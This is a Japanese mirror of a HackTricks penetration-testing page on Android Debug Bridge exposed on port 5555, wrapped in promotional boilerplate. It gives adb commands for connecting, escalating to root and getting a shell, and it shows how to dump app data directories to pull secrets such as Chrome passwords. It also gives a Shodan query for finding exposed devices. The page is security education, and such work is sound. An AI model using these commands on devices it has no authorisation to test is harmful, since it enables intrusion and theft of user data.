mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
4.7 KiB
4.7 KiB
5555 - Android Debug Bridge
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告掲載したい場合やHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローする
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
基本情報
Android Debug Bridge(adb)は、デバイスと通信するための多機能コマンドラインツールです。adbコマンドは、アプリのインストールやデバッグなど、さまざまなデバイスアクションを容易にし、デバイスでさまざまなコマンドを実行するために使用できるUnixシェルへのアクセスを提供します。(こちらから)
デフォルトポート: 5555。
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
接続
ADBサービスがデバイスのポートで実行されていて、接続できる場合、システム内でシェルを取得できます:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
以下のページでさらに多くのADBコマンドを確認できます:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
アプリデータのダンプ
アプリケーションのデータを完全にダウンロードするためには、次のことができます:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
このテクニックを使用して、Chromeのパスワードのような機密情報を取得することができます。これについての詳細は、こちらで提供されている情報と参考文献を確認してください。
Shodan
android debug bridge
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式のPEASS & HackTricksグッズを手に入れましょう。
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックしてください。
- 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローしてください。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。